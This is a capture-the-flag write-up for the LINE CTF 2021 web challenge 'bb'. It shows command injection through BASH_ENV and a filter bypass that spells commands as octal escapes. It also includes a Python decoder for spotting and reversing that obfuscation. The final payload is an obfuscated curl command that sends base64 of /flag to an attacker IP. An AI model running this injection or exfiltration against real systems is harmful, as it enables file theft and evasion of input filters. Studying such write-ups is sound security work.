@mdsnins
Last active March 27, 2022 06:13
[LINE CTF 2021] bb

bb

LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN

BASH_ENV environment variable

We can inject a bash command line through the BASH_ENV environment variable.

`BASH_ENV=touch /tmp /bin/bash` will execute touch.

Non-alphabet command

This is like the 34C3 CTF challenge: bash's ANSI-C quoting `$'...'` expands octal escapes, so `cat` can be written without any alphabetic characters as `$'\143\141\164'`.

Thus, the final payload is

`$%27\143\165\162\154%27%20111.111.111.111:40010/$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20$%27\142\141\163\145\66\64%27)`

Replace 111.111.111.111 with the attacker's IP.
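As an added, defender-side example (not part of the original writeup): a small Python decoder that URL-decodes a payload like the one above and expands bash's `$'...'` ANSI-C escapes (octal, hex and the common single-character escapes), so an analyst reading a request log can see the plaintext command the octal escapes hide. The `PAYLOAD` constant is the writeup's own payload; the function names are ours.

```python
import re
from urllib.parse import unquote

# Escapes recognised inside bash $'...' quoting: \nnn octal (1-3 digits),
# \xHH hex (1-2 digits), and the usual single-character escapes.
_ESCAPE_RE = re.compile(r"\\([0-7]{1,3}|x[0-9A-Fa-f]{1,2}|.)", re.S)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", "'": "'", '"': '"',
           "a": "\a", "b": "\b", "e": "\x1b", "f": "\f", "v": "\v"}

# A $'...' segment: backslash-escaped pairs or anything but quote/backslash.
_QUOTED_RE = re.compile(r"\$'((?:\\.|[^'\\])*)'")

# The writeup's payload as it appears in the URL (IP is the writeup's placeholder).
PAYLOAD = (r"$%27\143\165\162\154%27%20111.111.111.111:40010/"
           r"$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20"
           r"$%27\142\141\163\145\66\64%27)")


def decode_ansi_c(body: str) -> str:
    """Decode the contents of a bash $'...' string (bash truncates octal to 8 bits)."""
    def repl(m: re.Match) -> str:
        esc = m.group(1)
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        return _SIMPLE.get(esc, "\\" + esc)   # unknown escape: keep it verbatim
    return _ESCAPE_RE.sub(repl, body)


def deobfuscate(payload: str, url_encoded: bool = True) -> str:
    """URL-decode (optionally) and replace every $'...' segment with its plaintext."""
    raw = unquote(payload) if url_encoded else payload
    return _QUOTED_RE.sub(lambda m: decode_ansi_c(m.group(1)), raw)


def hides_letters(payload: str, url_encoded: bool = True) -> bool:
    """True when some $'...' segment uses escapes to spell alphabetic characters,
    which is the signature of the no-letters filter bypass used in this challenge."""
    raw = unquote(payload) if url_encoded else payload
    for m in _QUOTED_RE.finditer(raw):
        body = m.group(1)
        if "\\" in body and any(c.isalpha() for c in decode_ansi_c(body)):
            return True
    return False


if __name__ == "__main__":
    print(deobfuscate(PAYLOAD), "| obfuscated:", hides_letters(PAYLOAD))
```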

LINECTF{well..what_do_you_think_about}
